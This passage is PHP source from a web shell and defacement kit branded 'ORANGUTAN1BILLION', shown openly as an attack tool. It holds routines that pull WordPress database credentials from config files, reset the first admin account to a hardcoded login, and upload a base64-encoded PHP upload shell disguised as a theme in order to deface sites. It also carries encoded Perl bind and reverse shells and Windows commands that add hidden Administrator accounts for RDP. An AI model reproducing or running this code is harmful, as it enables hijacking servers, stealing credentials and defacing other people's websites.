1429.             }
1430.         }
1431.     } else {
1432.     echo "<center>";
1433.     echo "<br>";
1434.     echo "<b><font color=white>FAKE ROOT</b></font>";
1435.     echo "<br>";
1436.     echo "<br>";
1437.         echo "<center><form method='post'>
1438.         <font color=white>Filename: </font><br><input type='text' name='file' value='deface.html' size='58' height='10'><br>
1439.         <font color=white>User: </font><br><input type='text' value='$user' size='58' height='10' readonly><br>
1440.         <font color=white>Domain: </font><br>
1441.         <textarea style='width: 450px; height: 250px;' name='url'>";
1442.         reverse($_SERVER['HTTP_HOST']);
1443.         echo "</textarea><br>
1444.         <input type='submit' name='reverse' value='SCAN' style='width: 450px;'>
1445.         </form>
1446.         <font color=white>( i ) : After you use it, upload your deface file in dir /home/user/ and /home/user/public_html.</center></font>";
1447.     }
1448. } elseif($_GET['do'] == 'adminer') {
1449.     echo "<br>";
1450.     echo "<b><center><font color=white>ADMINER</b></center></font>";
1451.     echo "<br>";
1452.     echo "<br>";
1453.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1454.     function adminer($url, $isi) {
1455.         $fp = fopen($isi, "w");
1456.         $ch = curl_init();
1457.               curl_setopt($ch, CURLOPT_URL, $url);
1458.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1459.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1460.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1461.               curl_setopt($ch, CURLOPT_FILE, $fp);
1462.         return curl_exec($ch);
1463.               curl_close($ch);
1464.         fclose($fp);
1465.         ob_flush();
1466.         flush();
1467.     }
1468.     if(file_exists('adminer.php')) {
1469.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>{{{ Adminer Login }}}</a></font></center>";
1470.     } else {
1471.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1472.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1473.         } else {
1474.             echo "<center><font color=white>Failed making file adminer</font></center>";
1475.         }
1476.     }
1477. } elseif($_GET['do'] == 'auto_dwp') {
1478.     if($_POST['auto_deface_wp']) {
1479.         function anucurl($sites) {
1480.             $ch = curl_init($sites);
1481.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1482.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1483.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1484.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1485.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1486.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1487.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1488.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1489.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1490.             $data = curl_exec($ch);
1491.                   curl_close($ch);
1492.             return $data;
1493.         }
1494.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1495.             $post = array(
1496.                    "log" => "$userr",
1497.                    "pwd" => "$pass",
1498.                    "rememberme" => "forever",
1499.                    "wp-submit" => "$wp_submit",
1500.                    "whiteirect_to" => "$web",
1501.                    "testcookie" => "1",
1502.                    );
1503.             $ch = curl_init($cek);
1504.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1505.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1506.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1507.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1508.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1509.                   curl_setopt($ch, CURLOPT_POST, 1);
1510.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1511.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1512.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1513.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1514.             $data = curl_exec($ch);
1515.                   curl_close($ch);
1516.             return $data;
1517.         }
1518.         $scan = $_POST['link_config'];
1519.         $link_config = scandir($scan);
1520.         $script = htmlspecialchars($_POST['script']);
1521.         $user = "orangutan1billion";
1522.         $pass = "orangutan1billion";
1523.         $passx = md5($pass);
1524.         foreach($link_config as $dir_config) {
1525.             if(!is_file("$scan/$dir_config")) continue;
1526.             $config = file_get_contents("$scan/$dir_config");
1527.             if(preg_match("/WordPress/", $config)) {
1528.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1529.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1530.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1531.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1532.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1533.                 $prefix = $dbprefix."users";
1534.                 $option = $dbprefix."options";
1535.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1536.                 $db = mysql_select_db($dbname);
1537.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1538.                 $result = mysql_fetch_array($q);
1539.                 $id = $result[ID];
1540.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1541.                 $result2 = mysql_fetch_array($q2);
1542.                 $target = $result2[option_value];
1543.                 if($target == '') {                
1544.                     echo "[-] <font color=white>Can't get domain</font><br>";
1545.                 } else {
1546.                     echo "[+] $target <br>";
1547.                 }
1548.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1549.                 if(!$conn OR !$db OR !$update) {
1550.                     echo "[-] MySQL Error: <font color=white>".mysql_error()."</font><br><br>";
1551.                     mysql_close($conn);
1552.                 } else {
1553.                     $site = "$target/wp-login.php";
1554.                     $site2 = "$target/wp-admin/theme-install.php?upload";
1555.                     $b1 = anucurl($site2);
1556.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1557.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1558.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1559.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1560.                     $www = "m.php";
1561.                     $fp5 = fopen($www,"w");
1562.                     fputs($fp5,$upload3);
1563.                     $post2 = array(
1564.                             "_wpnonce" => "$anu2",
1565.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1566.                             "themezip" => "@$www",
1567.                             "install-theme-submit" => "Install Now",
1568.                             );
1569.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1570.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1571.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1572.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1573.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1574.                           curl_setopt($ch, CURLOPT_POST, 1);
1575.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1576.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1577.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1578.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1579.                     $data3 = curl_exec($ch);
1580.                           curl_close($ch);
1581.                     $y = date("Y");
1582.                     $m = date("m");
1583.                     $namafile = "id.php";
1584.                     $fpi = fopen($namafile,"w");
1585.                     fputs($fpi,$script);
1586.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1587.                            curl_setopt($ch6, CURLOPT_POST, true);
1588.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1589.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1590.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1591.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1592.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1593.                     $postResult = curl_exec($ch6);
1594.                            curl_close($ch6);
1595.                     $as = "$target/k.php";
1596.                     $bs = anucurl($as);
1597.                     if(preg_match("#$script#is", $bs)) {
1598.                         echo "[+] <font color='white'>Success.</font><br>";
1599.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1600.                         } else {
1601.                         echo "[-] <font color='white'>Failed</font><br>";
1602.                         echo "[!!] coba aja manual: <br>";
1603.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1604.                         echo "[+] username: <font color=white>$user</font><br>";
1605.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
1606.                         }
1607.                     mysql_close($conn);
1608.                 }
1609.             }
1610.         }
1611.     } else {
1612.             echo "<br>";
1613.     echo "<b><center><font color=white>WORDPRESS AUTO DEFACE</b></center></font>";
1614.     echo "<br>";
1615.     echo "<br>";
1616.         echo "<center>
1617.         <form method='post'>
1618.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1619.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by ORANGUTAN1BILLION' requiwhite><br>
1620.         <input type='submit' style='width: 400px;' name='auto_deface_wp' value='SMASH!'>
1621.         </form>
1622.         <br><font color=white><span>( i ) : It doesn't work if you try to running in config ( ex: /home/user/public_html/folder_config )</font></span>
1623.         </center>";
1624.     }
1625. } elseif($_GET['do'] == 'auto_dwp2') {
1626.     if($_POST['auto_deface_wp']) {
1627.         function anucurl($sites) {
1628.             $ch = curl_init($sites);
1629.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1630.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1631.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1632.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1633.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1634.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1635.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1636.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1637.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1638.             $data = curl_exec($ch);
1639.                   curl_close($ch);
1640.             return $data;
1641.         }
1642.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1643.             $post = array(
1644.                    "log" => "$userr",
1645.                    "pwd" => "$pass",
1646.                    "rememberme" => "forever",
1647.                    "wp-submit" => "$wp_submit",
1648.                    "whiteirect_to" => "$web",
1649.                    "testcookie" => "1",
1650.                    );
1651.             $ch = curl_init($cek);
1652.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1653.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1654.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1655.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1656.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1657.                   curl_setopt($ch, CURLOPT_POST, 1);
1658.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1659.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1660.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1661.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1662.             $data = curl_exec($ch);
1663.                   curl_close($ch);
1664.             return $data;
1665.         }
1666.         $link = explode("\r\n", $_POST['link']);
1667.         $script = htmlspecialchars($_POST['script']);
1668.         $user = "orangutan1billion";
1669.         $pass = "orangutan1billion";
1670.         $passx = md5($pass);
1671.         foreach($link as $dir_config) {
1672.             $config = anucurl($dir_config);
1673.             $dbhost = ambilkata($config,"DB_HOST', '","'");
1674.             $dbuser = ambilkata($config,"DB_USER', '","'");
1675.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1676.             $dbname = ambilkata($config,"DB_NAME', '","'");
1677.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
1678.             $prefix = $dbprefix."users";
1679.             $option = $dbprefix."options";
1680.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1681.             $db = mysql_select_db($dbname);
1682.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1683.             $result = mysql_fetch_array($q);
1684.             $id = $result[ID];
1685.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1686.             $result2 = mysql_fetch_array($q2);
1687.             $target = $result2[option_value];
1688.             if($target == '') {                
1689.                 echo "[-] <font color=white>Can't get domain</font><br>";
1690.             } else {
1691.                 echo "[+] $target <br>";
1692.             }
1693.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1694.             if(!$conn OR !$db OR !$update) {
1695.                 echo "[-] MySQL Error: <font color=white>".mysql_error()."</font><br><br>";
1696.                 mysql_close($conn);
1697.             } else {
1698.                 $site = "$target/wp-login.php";
1699.                 $site2 = "$target/wp-admin/theme-install.php?upload";
1700.                 $b1 = anucurl($site2);
1701.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1702.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1703.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1704.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1705.                 $www = "m.php";
1706.                 $fp5 = fopen($www,"w");
1707.                 fputs($fp5,$upload3);
1708.                 $post2 = array(
1709.                         "_wpnonce" => "$anu2",
1710.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1711.                         "themezip" => "@$www",
1712.                         "install-theme-submit" => "Install Now",
1713.                         );
1714.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1715.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1716.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1717.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1718.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1719.                       curl_setopt($ch, CURLOPT_POST, 1);
1720.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1721.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1722.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1723.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1724.                 $data3 = curl_exec($ch);
1725.                       curl_close($ch);
1726.                 $y = date("Y");
1727.                 $m = date("m");
1728.                 $namafile = "id.php";
1729.                 $fpi = fopen($namafile,"w");
1730.                 fputs($fpi,$script);
1731.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1732.                        curl_setopt($ch6, CURLOPT_POST, true);
1733.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1734.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1735.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1736.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1737.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1738.                 $postResult = curl_exec($ch6);
1739.                        curl_close($ch6);
1740.                 $as = "$target/k.php";
1741.                 $bs = anucurl($as);
1742.                 if(preg_match("#$script#is", $bs)) {
1743.                     echo "[+] <font color='white'>Success</font><br>";
1744.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1745.                     } else {
1746.                     echo "[-] <font color='white'>Failed</font><br>";
1747.                     echo "[!!] Try manual: <br>";
1748.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1749.                     echo "[+] username: <font color=white>$user</font><br>";
1750.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
1751.                     }
1752.                 mysql_close($conn);
1753.             }
1754.         }
1755.     } else {
1756.     echo "<br>";
1757.     echo "<b><center><font color=white>WORDPRESS AUTO DEFACE V.2</b></center></font>";
1758.     echo "<br>";
1759.     echo "<br>";
1760.         echo "<center>
1761.         <form method='post'>
1762.         <font color=white>Link Config:</font><br>
1763.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1764.         <input type='text' name='script' height='10' size='58' placeholder='Hacked by ORANGUTAN1BILLION' requiwhite><br>
1765.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='SMASH!!'>
1766.         </form></center>";
1767.     }
1768. } elseif($_GET['do'] == 'network') {
1769.         echo "<br>";
1770.     echo "<b><center><font color=white>NETWORK</b></center></font>";
1771.     echo "<br>";
1772.     echo "<br>";
1773.     echo "<form method='post'> <center>
1774.     <font color=white>Bind Port: <br>
1775.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1776.     <input type='submit' name='sub_bp' value='>>'>
1777.     </form>
1778.     <form method='post'>
1779.     <br><font color=white>Back Connect: <br>
1780.     <font color=white>Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1781.     <font color=white>PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1782.     <input type='submit' name='sub_bc' value='>>'>
1783.     </form>";
1784.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1785.     if(isset($_POST['sub_bp'])) {
1786.         $f_bp = fopen("/tmp/bp.pl", "w");
1787.         fwrite($f_bp, base64_decode($bind_port_p));
1788.         fclose($f_bp);
1789.  
1790.         $port = $_POST['port_bind'];
1791.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1792.         sleep(1);
1793.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1794.         unlink("/tmp/bp.pl");
1795.     }
1796.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1797.     if(isset($_POST['sub_bc'])) {
1798.         $f_bc = fopen("/tmp/bc.pl", "w");
1799.         fwrite($f_bc, base64_decode($bind_connect_p));
1800.         fclose($f_bc);
1801.  
1802.         $ipbc = $_POST['ip_bc'];
1803.         $port = $_POST['port_bc'];
1804.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1805.         sleep(1);
1806.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1807.         unlink("/tmp/bc.pl");
1808.     }
1809. } elseif($_GET['do'] == 'krdp_shell') {
1810.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1811.         if($_POST['create']) {
1812.             $user = htmlspecialchars($_POST['user']);
1813.             $pass = htmlspecialchars($_POST['pass']);
1814.             if(preg_match("/$user/", exe("net user"))) {
1815.                 echo "[INFO] -> <font color=white>user <font color=white>$user</font> sudah ada</font>";
1816.             } else {
1817.                 $add_user   = exe("net user $user $pass /add");
1818.                 $add_groups1 = exe("net localgroup Administrators $user /add");
1819.                 $add_groups2 = exe("net localgroup Administrator $user /add");
1820.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
1821.                 echo "[ RDP ACCOUNT INFO ]<br>
1822.                 ------------------------------<br>
1823.                 IP: <font color=white>".$ip."</font><br>
1824.                 Username: <font color=white>$user</font><br>
1825.                 Password: <font color=white>$pass</font><br>
1826.                 ------------------------------<br><br>
1827.                 [ STATUS ]<br>
1828.                 ------------------------------<br>
1829.                 ";
1830.                 if($add_user) {
1831.                     echo "[add user] -> <font color='white'>Success</font><br>";
1832.                 } else {
1833.                     echo "[add user] -> <font color='white'>Failed</font><br>";
1834.                 }
1835.                 if($add_groups1) {
1836.                     echo "[add localgroup Administrators] -> <font color='white'>Success</font><br>";
1837.                 } elseif($add_groups2) {
1838.                     echo "[add localgroup Administrator] -> <font color='white'>Success</font><br>";
1839.                 } elseif($add_groups3) {
1840.                     echo "[add localgroup Administrateur] -> <font color='white'>Success</font><br>";
1841.                 } else {
1842.                     echo "[add localgroup] -> <font color='white'>Failed</font><br>";
1843.                 }
1844.                 echo "------------------------------<br>";
1845.             }
1846.         } elseif($_POST['s_opsi']) {
1847.             $user = htmlspecialchars($_POST['r_user']);
1848.             if($_POST['opsi'] == '1') {
1849.                 $cek = exe("net user $user");
1850.                 echo "Checking username <font color=white>$user</font> ....... ";
1851.                 if(preg_match("/$user/", $cek)) {
1852.                     echo "[ <font color=white>Already exists</font> ]<br>
1853.                     ------------------------------<br><br>
1854.                     <pre>$cek</pre>";
1855.                 } else {
1856.                     echo "[ <font color=white>Doesn't exists</font> ]";
1857.                 }
1858.             } elseif($_POST['opsi'] == '2') {
1859.                 $cek = exe("net user $user orangutan1billion");
1860.                 if(preg_match("/$user/", exe("net user"))) {
1861.                     echo "[change password: <font color=white>orangutan1billion</font>] -> ";
1862.                     if($cek) {
1863.                         echo "<font color=white>Success</font>";
1864.                     } else {
1865.                         echo "<font color=white>Failed</font>";
1866.                     }
1867.                 } else {
1868.                     echo "[INFO] -> <font color=white>user <font color=white>$user</font> Doesn't exists</font>";
1869.                 }
1870.             } elseif($_POST['opsi'] == '3') {
1871.                 $cek = exe("net user $user /DELETE");
1872.                 if(preg_match("/$user/", exe("net user"))) {
1873.                     echo "[remove user: <font color=white>$user</font>] -> ";
1874.                     if($cek) {
1875.                         echo "<font color=white>Success</font>";
1876.                     } else {
1877.                         echo "<font color=white>Failed</font>";
1878.                     }
1879.                 } else {
1880.                     echo "[INFO] -> <font color=white>user <font color=white>$user</font> Doesn't exists</font>";
1881.                 }
1882.             } else {
1883.                 //
1884.             }
1885.         } else {
1886.     echo "<br>";
1887.     echo "<b><center><font color=white>K-RDP SHELL</b></center></font>";
1888.     echo "<br>";
1889.     echo "<br>";
1890.             echo "<center><font color=white>Create RDP</font><br>
1891.             <form method='post'>
1892.             <input type='text' name='user' placeholder='username' requiwhite>
1893.             <input type='text' name='pass' placeholder='password' requiwhite>
1894.             <input type='submit' name='create' value='>>'>
1895.             </form>
1896.             <font color=white>Option</font><br>
1897.             <form method='post'>
1898.             <input type='text' name='r_user' size='25px' placeholder='username' requiwhite>
1899.             <select name='opsi'>
1900.             <option value='1'>Check Username</option>
1901.             <option value='2'>Change Password</option>
1902.             <option value='3'>Delete Username</option>
1903.             </select>
1904.             <input type='submit' name='s_opsi' value='>>'>
1905.             </form>
1906.             ";
1907.         }
1908.     } else {
1909.         echo "<font color=white>It works if you running on Windows Server.</font>";
1910.     }
1911. } elseif($_GET['act'] == 'newfile') {
1912.     if($_POST['new_save_file']) {
1913.         $newfile = htmlspecialchars($_POST['newfile']);
1914.         $fopen = fopen($newfile, "a+");
1915.         if($fopen) {
1916.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1917.         } else {
1918.             $act = "<font color=white>Permission denied</font>";
1919.         }
1920.     }
1921.     echo $act;
1922.     echo "<form method='post'>
1923.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1924.     <input type='submit' name='new_save_file' value='Submit'>
1925.     </form>";
1926. } elseif($_GET['act'] == 'newfolder') {
1927.     if($_POST['new_save_folder']) {
1928.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1929.         if(!mkdir($new_folder)) {
1930.             $act = "<font color=white>Permission denied</font>";
1931.         } else {
1932.             $act = "<script>window.location='?dir=".$dir."';</script>";
1933.         }
1934.     }
1935.     echo $act;
1936.     echo "<form method='post'>
1937.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1938.     <input type='submit' name='new_save_folder' value='Submit'>
1939.     </form>";
1940. } elseif($_GET['act'] == 'rename_dir') {
1941.     if($_POST['dir_rename']) {
1942.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1943.         if($dir_rename) {
1944.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1945.         } else {
1946.             $act = "<font color=white>Permission denied</font>";
1947.         }
1948.     echo "".$act."<br>";
1949.     }
1950.     echo "<form method='post'>
1951.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1952.     <input type='submit' name='dir_rename' value='rename'>
1953.     </form>";
1954. } elseif($_GET['act'] == 'delete_dir') {
1955.     if(is_dir($dir)) {
1956.         if(is_writable($dir)) {
1957.             @rmdir($dir);
1958.             @exe("rm -rf $dir");
1959.             @exe("rmdir /s /q $dir");
1960.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1961.         } else {
1962.             $act = "<font color=white>Could not remove ".basename($dir)."</font>";
1963.         }
1964.     }
1965.     echo $act;
1966. } elseif($_GET['act'] == 'view') {
1967.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Delete</a> ]<br>";
1968.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1969. } elseif($_GET['act'] == 'edit') {
1970.     if($_POST['save']) {
1971.         $save = file_put_contents($_GET['file'], $_POST['src']);
1972.         if($save) {
1973.             $act = "<font color=white>Saved</font>";
1974.         } else {
1975.             $act = "<font color=white>Permission denied</font>";
1976.         }
1977.     echo "".$act."<br>";
1978.     }
